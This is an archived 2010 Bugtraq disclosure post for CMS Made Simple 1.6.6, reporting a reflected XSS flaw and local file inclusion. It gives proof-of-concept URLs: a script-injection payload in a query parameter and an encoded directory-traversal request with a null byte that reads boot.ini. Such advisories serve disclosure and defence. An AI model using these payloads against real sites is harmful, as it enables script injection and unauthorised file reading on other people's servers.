| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 12 Feb 2010 10:03:41 -0700
From: beenudel1986@...il.com
To: bugtraq@...urityfocus.com
Subject: cmsmadesimple Multiple Security Issues : XSS+ LFI
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Greetz to all Darkc0de ,AI,ICW, AH Memebers
# Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986@...il.com
#
# Share the c0de!
#
################################################################
#
# Exploit: Multiple Vulnerablities in cmsmadesimple
#
# AppSite: http://www.cmsmadesimple.com/
#
# Tested Version : 1.6.6
# XSS
#
# POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
#
#
#
# Multiple Local File Inclusion
#
# Sample URL:
# POC:-http://localhost:80/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
#
#
################################################################
Powered by blists - more mailing lists